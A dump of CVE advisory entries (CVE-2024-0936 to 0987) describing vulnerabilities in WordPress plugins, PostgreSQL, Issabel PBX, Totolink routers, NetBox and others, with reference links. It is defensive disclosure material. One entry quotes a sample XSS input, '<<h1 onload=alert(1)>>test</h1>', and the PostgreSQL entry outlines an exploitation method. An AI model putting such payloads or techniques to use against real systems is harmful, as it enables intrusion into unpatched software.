CVE    2024    987    Candidate    A vulnerability classified as critical has been found in Sichuan Yougou Technology KuERP up to 1.0.4. Affected is an unknown function of the file /runtime/log. The manipulation leads to improper output neutralization for logs. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252252. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://note.zhaoj.in/share/mhLwGOcLxYfP   |   URL:https://note.zhaoj.in/share/mhLwGOcLxYfP   |   MISC:https://vuldb.com/?ctiid.252252   |   URL:https://vuldb.com/?ctiid.252252   |   MISC:https://vuldb.com/?id.252252   |   URL:https://vuldb.com/?id.252252    Assigned (20240128)
CVE    2024    986    Candidate    A vulnerability was found in Issabel PBX 4.0.0. It has been rated as critical. This issue affects some unknown processing of the file /index.php?menu=asterisk_cli of the component Asterisk-Cli. The manipulation of the argument Command leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252251. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://drive.google.com/file/d/10BYLQ7Rk4oag96afLZouSvDDPvsO7SoJ/view?usp=drive_link   |   URL:https://drive.google.com/file/d/10BYLQ7Rk4oag96afLZouSvDDPvsO7SoJ/view?usp=drive_link   |   MISC:https://vuldb.com/?ctiid.252251   |   URL:https://vuldb.com/?ctiid.252251   |   MISC:https://vuldb.com/?id.252251   |   URL:https://vuldb.com/?id.252251    Assigned (20240128)
CVE    2024    985    Candidate    Late privilege drop in REFRESH MATERIALIZED VIEW CONCURRENTLY in PostgreSQL allows an object creator to execute arbitrary SQL functions as the command issuer. The command intends to run SQL functions as the owner of the materialized view, enabling safe refresh of untrusted materialized views. The victim is a superuser or member of one of the attacker's roles. The attack requires luring the victim into running REFRESH MATERIALIZED VIEW CONCURRENTLY on the attacker's materialized view. As part of exploiting this vulnerability, the attacker creates functions that use CREATE RULE to convert the internally-built temporary table to a view. Versions before PostgreSQL 15.6, 14.11, 13.14, and 12.18 are affected. The only known exploit does not work in PostgreSQL 16 and later. For defense in depth, PostgreSQL 16.2 adds the protections that older branches are using to fix their vulnerability.    MISC:https://www.postgresql.org/support/security/CVE-2024-0985/   |   URL:https://www.postgresql.org/support/security/CVE-2024-0985/   |   MLIST:[debian-lts-announce] 20240318 [SECURITY] [DLA 3764-1] postgresql-11 security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00017.html    Assigned (20240127)
CVE    2024    984    Candidate    The ImageRecycle pdf & image compression plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the disableOptimization function in all versions up to, and including, 3.1.13. This makes it possible for authenticated attackers, with subscriber-level access and above, to disable the image optimization setting.    MISC:https://plugins.trac.wordpress.org/changeset/3031424/imagerecycle-pdf-image-compression   |   URL:https://plugins.trac.wordpress.org/changeset/3031424/imagerecycle-pdf-image-compression   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/cc9dd55d-3c37-4f24-81a1-fdc8ca284566?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/cc9dd55d-3c37-4f24-81a1-fdc8ca284566?source=cve    Assigned (20240126)
CVE    2024    983    Candidate    The ImageRecycle pdf & image compression plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the enableOptimization function in all versions up to, and including, 3.1.13. This makes it possible for authenticated attackers, with subscriber-level access and above, to enable image optimization.    MISC:https://plugins.trac.wordpress.org/changeset/3031424/imagerecycle-pdf-image-compression   |   URL:https://plugins.trac.wordpress.org/changeset/3031424/imagerecycle-pdf-image-compression   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/175dd04d-ce06-45a0-8cfe-14498e2f9198?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/175dd04d-ce06-45a0-8cfe-14498e2f9198?source=cve    Assigned (20240126)
CVE    2024    978    Candidate    The My Private Site plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.0.14 via the REST API. This makes it possible for unauthenticated attackers to bypass the plugin's site privacy feature and view restricted page and post content.    MISC:https://plugins.trac.wordpress.org/changeset/3036015/jonradio-private-site   |   URL:https://plugins.trac.wordpress.org/changeset/3036015/jonradio-private-site   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/970bc71c-7d0a-4761-874a-379cda71418e?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/970bc71c-7d0a-4761-874a-379cda71418e?source=cve    Assigned (20240126)
CVE    2024    977    Candidate    The Timeline Widget For Elementor (Elementor Timeline, Vertical & Horizontal Timeline) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via image URLs in the plugin's timeline widget in all versions up to, and including, 1.5.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page, changes the slideshow type, and then changes it back to an image.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3029865%40timeline-widget-addon-for-elementor&new=3029865%40timeline-widget-addon-for-elementor&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3029865%40timeline-widget-addon-for-elementor&new=3029865%40timeline-widget-addon-for-elementor&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/03073726-58d0-45b3-b7a6-7d12dbede919?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/03073726-58d0-45b3-b7a6-7d12dbede919?source=cve    Assigned (20240126)
CVE    2024    976    Candidate    The WP Event Manager – Events Calendar, Registrations, Sell Tickets with WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the plugin parameter in all versions up to, and including, 3.1.41 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/browser/wp-event-manager/trunk/admin/wp-event-manager-shortcode-list.php#L32   |   URL:https://plugins.trac.wordpress.org/browser/wp-event-manager/trunk/admin/wp-event-manager-shortcode-list.php#L32   |   MISC:https://plugins.trac.wordpress.org/changeset/3039683/wp-event-manager/trunk/admin/wp-event-manager-shortcode-list.php   |   URL:https://plugins.trac.wordpress.org/changeset/3039683/wp-event-manager/trunk/admin/wp-event-manager-shortcode-list.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/4d7f4d17-8318-4ab3-b4a2-81d7a017c397?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/4d7f4d17-8318-4ab3-b4a2-81d7a017c397?source=cve    Assigned (20240126)
CVE    2024    975    Candidate    The WordPress Access Control plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.0.13 via the REST API. This makes it possible for unauthenticated attackers to bypass the plugin's "Make Website Members Only" feature (when unset) and view restricted page and post content.    MISC:https://plugins.trac.wordpress.org/browser/wordpress-access-control/trunk/wordpress-access-control.php#L289   |   URL:https://plugins.trac.wordpress.org/browser/wordpress-access-control/trunk/wordpress-access-control.php#L289   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/31f13524-2bd7-4157-b378-455ac4f822a1?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/31f13524-2bd7-4157-b378-455ac4f822a1?source=cve    Assigned (20240126)
CVE    2024    973    Candidate    The Widget for Social Page Feeds WordPress plugin before 6.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).    MISC:https://wpscan.com/vulnerability/798de421-4814-46a9-a055-ebb95a7218ed/   |   URL:https://wpscan.com/vulnerability/798de421-4814-46a9-a055-ebb95a7218ed/    Assigned (20240126)
CVE    2024    971    Candidate    A SQL injection vulnerability exists where an authenticated, low-privileged remote attacker could potentially alter scan DB content.    MISC:https://www.tenable.com/security/tns-2024-01   |   URL:https://www.tenable.com/security/tns-2024-01    Assigned (20240126)
CVE    2024    969    Candidate    The ARMember plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.0.21 via the REST API. This makes it possible for unauthenticated attackers to bypass the plugin's "Default Restriction" feature and view restricted post content.    MISC:https://plugins.trac.wordpress.org/changeset/3030044/armember-membership/trunk/core/classes/class.arm_restriction.php   |   URL:https://plugins.trac.wordpress.org/changeset/3030044/armember-membership/trunk/core/classes/class.arm_restriction.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/ea4e6718-4e1e-44ce-8463-860f0d3d80f5?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/ea4e6718-4e1e-44ce-8463-860f0d3d80f5?source=cve    Assigned (20240126)
CVE    2024    968    Candidate    Cross-site Scripting (XSS) - DOM in GitHub repository langchain-ai/chat-langchain prior to 0.0.0.    MISC:https://github.com/langchain-ai/chat-langchain/commit/e13db53cba2a48e4e26d103fd51598856f6bdd33   |   URL:https://github.com/langchain-ai/chat-langchain/commit/e13db53cba2a48e4e26d103fd51598856f6bdd33   |   MISC:https://huntr.com/bounties/566033b9-df20-4928-b4aa-5cd4c3ca1561   |   URL:https://huntr.com/bounties/566033b9-df20-4928-b4aa-5cd4c3ca1561    Assigned (20240126)
CVE    2024    967    Candidate    A potential vulnerability has been identified in OpenText / Micro Focus ArcSight Enterprise Security Manager (ESM). The vulnerability could be remotely exploited.    MISC:https://portal.microfocus.com/s/article/KM000027060   |   URL:https://portal.microfocus.com/s/article/KM000027060    Assigned (20240126)
CVE    2024    966    Candidate    The Shariff Wrapper plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'shariff' shortcode in all versions up to, and including, 4.6.9 due to insufficient input sanitization and output escaping on user supplied attributes like 'info_text'. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page and clicks the information icon.    MISC:https://plugins.trac.wordpress.org/browser/shariff/trunk/services/shariff-info.php#L46   |   URL:https://plugins.trac.wordpress.org/browser/shariff/trunk/services/shariff-info.php#L46   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030487%40shariff&new=3030487%40shariff&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030487%40shariff&new=3030487%40shariff&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/8588f9e8-441c-4b9e-bd78-8526d8c28fa3?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/8588f9e8-441c-4b9e-bd78-8526d8c28fa3?source=cve    Assigned (20240126)
CVE    2024    965    Candidate    The Simple Page Access Restriction plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.0.21 via the REST API. This makes it possible for unauthenticated attackers to bypass the plugin's page restriction and view page content.    MISC:https://plugins.trac.wordpress.org/changeset/3030099/simple-page-access-restriction   |   URL:https://plugins.trac.wordpress.org/changeset/3030099/simple-page-access-restriction   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/d99dc270-1b28-4e76-9346-38b2b96be01c?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/d99dc270-1b28-4e76-9346-38b2b96be01c?source=cve    Assigned (20240126)
CVE    2024    964    Candidate    A local file include could be remotely triggered in Gradio due to a vulnerable user-supplied JSON value in an API request.    MISC:https://github.com/gradio-app/gradio/commit/d76bcaaaf0734aaf49a680f94ea9d4d22a602e70   |   URL:https://github.com/gradio-app/gradio/commit/d76bcaaaf0734aaf49a680f94ea9d4d22a602e70   |   MISC:https://huntr.com/bounties/25e25501-5918-429c-8541-88832dfd3741   |   URL:https://huntr.com/bounties/25e25501-5918-429c-8541-88832dfd3741    Assigned (20240126)
CVE    2024    963    Candidate    The Calculated Fields Form plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's CP_CALCULATED_FIELDS shortcode in all versions up to, and including, 1.2.52 due to insufficient input sanitization and output escaping on user supplied 'location' attribute. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset/3029782/calculated-fields-form/trunk/inc/cpcff_main.inc.php   |   URL:https://plugins.trac.wordpress.org/changeset/3029782/calculated-fields-form/trunk/inc/cpcff_main.inc.php   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3029782%40calculated-fields-form&new=3029782%40calculated-fields-form&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3029782%40calculated-fields-form&new=3029782%40calculated-fields-form&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/d870ff8d-ea4b-4777-9892-0d9982182b9f?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/d870ff8d-ea4b-4777-9892-0d9982182b9f?source=cve    Assigned (20240126)
CVE    2024    962    Candidate    A vulnerability was found in obgm libcoap 4.3.4. It has been rated as critical. Affected by this issue is the function get_split_entry of the file src/coap_oscore.c of the component Configuration File Handler. The manipulation leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. VDB-252206 is the identifier assigned to this vulnerability.    MISC:https://github.com/obgm/libcoap/issues/1310   |   URL:https://github.com/obgm/libcoap/issues/1310   |   MISC:https://github.com/obgm/libcoap/issues/1310#issue-2099860835   |   URL:https://github.com/obgm/libcoap/issues/1310#issue-2099860835   |   MISC:https://github.com/obgm/libcoap/pull/1311   |   URL:https://github.com/obgm/libcoap/pull/1311   |   MISC:https://vuldb.com/?ctiid.252206   |   URL:https://vuldb.com/?ctiid.252206   |   MISC:https://vuldb.com/?id.252206   |   URL:https://vuldb.com/?id.252206    Assigned (20240126)
CVE    2024    961    Candidate    The SiteOrigin Widgets Bundle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the code editor in all versions up to, and including, 1.58.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/so-widgets-bundle/trunk/widgets/button/button.php#L355   |   URL:https://plugins.trac.wordpress.org/browser/so-widgets-bundle/trunk/widgets/button/button.php#L355   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3027675%40so-widgets-bundle%2Ftrunk&old=3027506%40so-widgets-bundle%2Ftrunk&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3027675%40so-widgets-bundle%2Ftrunk&old=3027506%40so-widgets-bundle%2Ftrunk&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/6f7c164f-2f78-4857-94b9-077c2dea13df?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/6f7c164f-2f78-4857-94b9-077c2dea13df?source=cve    Assigned (20240126)
CVE    2024    960    Candidate    A vulnerability was found in flink-extended ai-flow 0.3.1. It has been declared as critical. Affected by this vulnerability is the function cloudpickle.loads of the file \ai_flow\cli\commands\workflow_command.py. The manipulation leads to deserialization. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-252205 was assigned to this vulnerability.    MISC:https://github.com/bayuncao/vul-cve-8   |   URL:https://github.com/bayuncao/vul-cve-8   |   MISC:https://github.com/bayuncao/vul-cve-8/blob/main/dataset.pkl   |   URL:https://github.com/bayuncao/vul-cve-8/blob/main/dataset.pkl   |   MISC:https://vuldb.com/?ctiid.252205   |   URL:https://vuldb.com/?ctiid.252205   |   MISC:https://vuldb.com/?id.252205   |   URL:https://vuldb.com/?id.252205    Assigned (20240126)
CVE    2024    959    Candidate    A vulnerability was found in StanfordVL GibsonEnv 0.3.1. It has been classified as critical. Affected is the function cloudpickle.load of the file gibson\utils\pposgd_fuse.py. The manipulation leads to deserialization. It is possible to launch the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252204.    MISC:https://github.com/bayuncao/vul-cve-7   |   URL:https://github.com/bayuncao/vul-cve-7   |   MISC:https://github.com/bayuncao/vul-cve-7/blob/main/dataset.pkl   |   URL:https://github.com/bayuncao/vul-cve-7/blob/main/dataset.pkl   |   MISC:https://vuldb.com/?ctiid.252204   |   URL:https://vuldb.com/?ctiid.252204   |   MISC:https://vuldb.com/?id.252204   |   URL:https://vuldb.com/?id.252204    Assigned (20240126)
CVE    2024    958    Candidate    A vulnerability was found in CodeAstro Stock Management System 1.0 and classified as problematic. This issue affects some unknown processing of the file /index.php of the component Add Category Handler. The manipulation of the argument Category Name/Category Description leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252203.    MISC:https://drive.google.com/drive/folders/17JTwjuT09q7he_oXkMtZS5jyyXw8ZIgg?usp=sharing   |   URL:https://drive.google.com/drive/folders/17JTwjuT09q7he_oXkMtZS5jyyXw8ZIgg?usp=sharing   |   MISC:https://vuldb.com/?ctiid.252203   |   URL:https://vuldb.com/?ctiid.252203   |   MISC:https://vuldb.com/?id.252203   |   URL:https://vuldb.com/?id.252203    Assigned (20240126)
CVE    2024    957    Candidate    The WooCommerce PDF Invoices, Packing Slips, Delivery Notes and Shipping Labels plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Customer Notes field in all versions up to, and including, 4.4.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected invoice for printing.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3050923%40print-invoices-packing-slip-labels-for-woocommerce&new=3050923%40print-invoices-packing-slip-labels-for-woocommerce&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3050923%40print-invoices-packing-slip-labels-for-woocommerce&new=3050923%40print-invoices-packing-slip-labels-for-woocommerce&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/c7ba4218-5b60-4e72-b98d-7c95c9fc3d59?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/c7ba4218-5b60-4e72-b98d-7c95c9fc3d59?source=cve    Assigned (20240126)
CVE    2024    955    Candidate    A stored XSS vulnerability exists where an authenticated, remote attacker with administrator privileges on the Nessus application could alter Nessus proxy settings, which could lead to the execution of remote arbitrary scripts.    MISC:https://www.tenable.com/security/tns-2024-01   |   URL:https://www.tenable.com/security/tns-2024-01    Assigned (20240126)
CVE    2024    954    Candidate    The Essential Addons for Elementor – Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting through editing context via the 'data-eael-wrapper-link' wrapper in all versions up to, and including, 5.9.7 due to insufficient input sanitization and output escaping on user supplied protocols. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset/3029928/essential-addons-for-elementor-lite/tags/5.9.8/assets/front-end/js/view/wrapper-link.js   |   URL:https://plugins.trac.wordpress.org/changeset/3029928/essential-addons-for-elementor-lite/tags/5.9.8/assets/front-end/js/view/wrapper-link.js   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/875db71d-c799-40b9-95e1-74d53046b0a9?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/875db71d-c799-40b9-95e1-74d53046b0a9?source=cve    Assigned (20240126)
CVE    2024    953    Candidate    When a user scans a QR Code with the QR Code Scanner feature, the user is not prompted before being navigated to the page specified in the code. This may surprise the user and potentially direct them to unwanted content.    MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1837916   |   URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1837916    Assigned (20240126)
CVE    2024    951    Candidate    The Advanced Social Feeds Widget & Shortcode WordPress plugin through 1.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).    MISC:https://wpscan.com/vulnerability/88b2e479-eb15-4213-9df8-3d353074974e/   |   URL:https://wpscan.com/vulnerability/88b2e479-eb15-4213-9df8-3d353074974e/    Assigned (20240126)
CVE    2024    948    Candidate    A vulnerability, which was classified as problematic, has been found in NetBox up to 3.7.0. This issue affects some unknown processing of the file /core/config-revisions of the component Home Page Configuration. The manipulation with the input <<h1 onload=alert(1)>>test</h1> leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252191. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://drive.google.com/file/d/1tcgyzu9Fh3AMG0INR0EdOR7ZjWmBK0ZR/view?usp=sharing   |   URL:https://drive.google.com/file/d/1tcgyzu9Fh3AMG0INR0EdOR7ZjWmBK0ZR/view?usp=sharing   |   MISC:https://vuldb.com/?ctiid.252191   |   URL:https://vuldb.com/?ctiid.252191   |   MISC:https://vuldb.com/?id.252191   |   URL:https://vuldb.com/?id.252191    Assigned (20240126)
CVE    2024    946    Candidate    A vulnerability classified as critical was found in 60IndexPage up to 1.8.5. This vulnerability affects unknown code of the file /apply/index.php of the component Parameter Handler. The manipulation of the argument url leads to server-side request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-252190 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://note.zhaoj.in/share/iNSyaClT0hGi   |   URL:https://note.zhaoj.in/share/iNSyaClT0hGi   |   MISC:https://vuldb.com/?ctiid.252190   |   URL:https://vuldb.com/?ctiid.252190   |   MISC:https://vuldb.com/?id.252190   |   URL:https://vuldb.com/?id.252190    Assigned (20240126)
CVE    2024    945    Candidate    A vulnerability classified as critical has been found in 60IndexPage up to 1.8.5. This affects an unknown part of the file /include/file.php of the component Parameter Handler. The manipulation of the argument url leads to server-side request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252189 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://note.zhaoj.in/share/7F54gy22y7uJ   |   URL:https://note.zhaoj.in/share/7F54gy22y7uJ   |   MISC:https://vuldb.com/?ctiid.252189   |   URL:https://vuldb.com/?ctiid.252189   |   MISC:https://vuldb.com/?id.252189   |   URL:https://vuldb.com/?id.252189    Assigned (20240126)
CVE    2024    944    Candidate    A vulnerability was found in Totolink T8 4.1.5cu.833_20220905. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /cgi-bin/cstecgi.cgi. The manipulation leads to session expiration. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252188. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://drive.google.com/file/d/1YPisSnxM5CwSLKFgs9w5k5MtNUgiijVo/view?usp=sharing   |   URL:https://drive.google.com/file/d/1YPisSnxM5CwSLKFgs9w5k5MtNUgiijVo/view?usp=sharing   |   MISC:https://vuldb.com/?ctiid.252188   |   URL:https://vuldb.com/?ctiid.252188   |   MISC:https://vuldb.com/?id.252188   |   URL:https://vuldb.com/?id.252188    Assigned (20240126)
CVE    2024    943    Candidate    A vulnerability was found in Totolink N350RT 9.3.5u.6255. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /cgi-bin/cstecgi.cgi. The manipulation leads to session expiration. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252187. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://drive.google.com/file/d/1OBs4kc1KvbqrMhQHs54WtwxxxiBoI0hL/view?usp=sharing   |   URL:https://drive.google.com/file/d/1OBs4kc1KvbqrMhQHs54WtwxxxiBoI0hL/view?usp=sharing   |   MISC:https://vuldb.com/?ctiid.252187   |   URL:https://vuldb.com/?ctiid.252187   |   MISC:https://vuldb.com/?id.252187   |   URL:https://vuldb.com/?id.252187    Assigned (20240126)
CVE    2024    942    Candidate    A vulnerability was found in Totolink N200RE V5 9.3.5u.6255_B20211224. It has been classified as problematic. Affected is an unknown function of the file /cgi-bin/cstecgi.cgi. The manipulation leads to session expiration. It is possible to launch the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. VDB-252186 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://drive.google.com/file/d/1oWAGbmDtHDIUN1WSRAh4ZnuzHOuvTU4T/view?usp=sharing   |   URL:https://drive.google.com/file/d/1oWAGbmDtHDIUN1WSRAh4ZnuzHOuvTU4T/view?usp=sharing   |   MISC:https://vuldb.com/?ctiid.252186   |   URL:https://vuldb.com/?ctiid.252186   |   MISC:https://vuldb.com/?id.252186   |   URL:https://vuldb.com/?id.252186   |   MISC:https://youtu.be/b0tU2CiLbnU   |   URL:https://youtu.be/b0tU2CiLbnU    Assigned (20240126)
CVE    2024    941    Candidate    A vulnerability was found in Novel-Plus 4.3.0-RC1 and classified as critical. This issue affects some unknown processing of the file /novel/bookComment/list. The manipulation of the argument sort leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-252185 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/red0-ha1yu/warehouse/blob/main/novel-plus_sqlinject2.md   |   URL:https://github.com/red0-ha1yu/warehouse/blob/main/novel-plus_sqlinject2.md   |   MISC:https://vuldb.com/?ctiid.252185   |   URL:https://vuldb.com/?ctiid.252185   |   MISC:https://vuldb.com/?id.252185   |   URL:https://vuldb.com/?id.252185    Assigned (20240126)
CVE    2024    939    Candidate    A vulnerability has been found in Beijing Baichuo Smart S210 Management Platform up to 20240117 and classified as critical. This vulnerability affects unknown code of the file /Tool/uploadfile.php. The manipulation of the argument file_upload leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252184. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/Yu1e/vuls/blob/main/an%20arbitrary%20file%20upload%20vulnerability%20in%20BaiZhuo%20Networks%20Smart%20S210%20multi-service%20security%20gateway%20intelligent%20management%20platform.md   |   URL:https://github.com/Yu1e/vuls/blob/main/an%20arbitrary%20file%20upload%20vulnerability%20in%20BaiZhuo%20Networks%20Smart%20S210%20multi-service%20security%20gateway%20intelligent%20management%20platform.md   |   MISC:https://vuldb.com/?ctiid.252184   |   URL:https://vuldb.com/?ctiid.252184   |   MISC:https://vuldb.com/?id.252184   |   URL:https://vuldb.com/?id.252184    Assigned (20240126)
CVE    2024    938    Candidate    A vulnerability, which was classified as critical, was found in Tongda OA 2017 up to 11.9. This affects an unknown part of the file /general/email/inbox/delete_webmail.php. The manipulation of the argument WEBBODY_ID_STR leads to sql injection. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-252183. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/Yu1e/vuls/blob/main/SQL%20injection%20vulnerability%20exists%20in%20Tongda%20OA.md   |   URL:https://github.com/Yu1e/vuls/blob/main/SQL%20injection%20vulnerability%20exists%20in%20Tongda%20OA.md   |   MISC:https://vuldb.com/?ctiid.252183   |   URL:https://vuldb.com/?ctiid.252183   |   MISC:https://vuldb.com/?id.252183   |   URL:https://vuldb.com/?id.252183    Assigned (20240126)
CVE    2024    937    Candidate    A vulnerability, which was classified as critical, has been found in van_der_Schaar LAB synthcity 0.2.9. Affected by this issue is the function load_from_file of the component PKL File Handler. The manipulation leads to deserialization. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252182 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early and confirmed immediately the existence of the issue. A patch is planned to be released in February 2024.    MISC:https://github.com/bayuncao/vul-cve-6   |   URL:https://github.com/bayuncao/vul-cve-6   |   MISC:https://github.com/bayuncao/vul-cve-6/blob/main/poc.py   |   URL:https://github.com/bayuncao/vul-cve-6/blob/main/poc.py   |   MISC:https://vuldb.com/?ctiid.252182   |   URL:https://vuldb.com/?ctiid.252182   |   MISC:https://vuldb.com/?id.252182   |   URL:https://vuldb.com/?id.252182    Assigned (20240126)
CVE    2024    936    Candidate    A vulnerability classified as critical was found in van_der_Schaar LAB TemporAI 0.0.3. Affected by this vulnerability is the function load_from_file of the component PKL File Handler. The manipulation leads to deserialization. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252181 was assigned to this vulnerability. NOTE: The vendor was contacted early and confirmed immediately the existence of the issue. A patch is planned to be released in February 2024.    MISC:https://github.com/bayuncao/vul-cve-5   |   URL:https://github.com/bayuncao/vul-cve-5   |   MISC:https://github.com/bayuncao/vul-cve-5/blob/main/poc.py   |   URL:https://github.com/bayuncao/vul-cve-5/blob/main/poc.py   |   MISC:https://vuldb.com/?ctiid.252181   |   URL:https://vuldb.com/?ctiid.252181   |   MISC:https://vuldb.com/?id.252181   |   URL:https://vuldb.com/?id.252181    Assigned (20240126)
